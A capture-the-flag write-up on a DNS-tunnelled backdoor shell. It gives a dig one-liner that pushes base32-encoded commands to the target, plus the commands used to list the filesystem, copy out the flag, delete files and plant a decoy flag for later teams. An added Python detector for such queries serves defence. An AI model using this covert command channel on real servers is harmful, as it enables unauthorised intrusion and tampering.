OpenCTF 2015 - dnsh (botnet,pwnable 100) Writeup


dnsh 100 --- Our IDS picked up this CnC traffic - please ANALyze it -

The provided pcap contains an HTTP request that results in a 404, a bunch of weird DNS queries, and then the same previously-404ing request succeeding. Brute-force decoding reveals that the DNS queries are a back door shell. The DNS queries are of the form:


Decoding the queries in the pcap shows that the webserver files are in ~/www/files/:

cp /var/www/html/*.swf ~/.
mv *.swf ~/www/files/.

A very quick and dirty script to push commands to the target server was written by Javantea:

dig @ <base32 string>.$(echo -n <base32 string> |md5sum |head -c 32)

For instance, to run [rm ~/www/files/n*], a necessary step to remove all of our flag files after the challenge is completed, you can run the following command:

dig @ OJWSA7RPO53XOL3GNFWGK4ZPNYVA.$(echo -n OJWSA7RPO53XOL3GNFWGK4ZPNYVA |md5sum |head -c 32)
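As a defender-side companion to the query format above (an added example, not part of the original writeup or Javantea's script), this Python scans resolver-style log lines for names of the <base32>.<md5> shape, verifies the checksum label and decodes the carried command. The log lines are constructed; encode_query reproduces the dig one-liner's encoding so the sample names are built the same way the client builds them.

```python
import base64
import hashlib
import re

# Query-name shape of the backdoor: <unpadded base32 of command>.<md5 hex of that base32 text>
DNSH_NAME = re.compile(r"^([A-Z2-7]+)\.([0-9a-f]{32})\.?$")

def encode_query(command: str) -> str:
    """Build a query name the same way the dig one-liner does: strip base32 padding, then md5 it."""
    b32 = base64.b32encode(command.encode()).decode().rstrip("=")
    return f"{b32}.{hashlib.md5(b32.encode()).hexdigest()}"

def decode_query(qname: str):
    """Return the command carried by qname, or None if it is not a checksummed dnsh name."""
    m = DNSH_NAME.match(qname)
    if not m:
        return None
    b32, digest = m.groups()
    # The second label is a checksum of the first; a mismatch is a random base32-looking
    # label (or a spoofed name), not the backdoor protocol, so do not alert on it.
    if hashlib.md5(b32.encode()).hexdigest() != digest:
        return None
    try:
        # The client strips '=' padding, so restore it to a multiple of 8 chars before decoding.
        return base64.b32decode(b32 + "=" * (-len(b32) % 8)).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_log(lines):
    """Return (qname, command) for every resolver log line carrying a decodable dnsh query."""
    hits = []
    for line in lines:
        for token in line.split():
            cmd = decode_query(token)
            if cmd is not None:
                hits.append((token, cmd))
    return hits

# Constructed resolver log lines, not from the challenge pcap. The third line reuses the base32
# label from the writeup, with its md5 label computed here exactly as the dig command does.
WRITEUP_LABEL = "OJWSA7RPO53XOL3GNFWGK4ZPNYVA"
SAMPLE_LOG = [
    "12:00:01 client 10.0.0.5 query: www.example.com. IN A",
    "12:00:02 client 10.0.0.5 query: " + encode_query("cp /var/www/html/*.swf ~/.") + " IN A",
    "12:00:03 client 10.0.0.5 query: " + WRITEUP_LABEL + "." + hashlib.md5(WRITEUP_LABEL.encode()).hexdigest() + " IN A",
    "12:00:04 client 10.0.0.5 query: " + WRITEUP_LABEL + "." + "0" * 32 + " IN A",  # right shape, wrong checksum
]
```

scan_log(SAMPLE_LOG) returns the two backdoor commands and skips both the ordinary query and the name whose checksum label does not match.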

Only a small amount of trouble is caused by the length limitations in DNS queries. Unfortunately the flag doesn't seem to be in any obvious location near the CWD, so instead the whole filesystem is listed recursively into a web-served file:

ls -alR / > www/files/neg9.txt

The flag was then found at /var/www/.hide/ctf_flag.txt. At this point we started hitting length limitations in our DNS queries, so a slightly creative command using shell globs was written to shorten it:

cp /var/w*/.h*/c*.txt www/files/n

Requesting the n document revealed the key:


This was followed by some light trolling to mess with any teams after us:

echo "th3_c@t_is_#1" > flag.txt

Posted on Aug. 12, 2015, 9:10 a.m. by reidb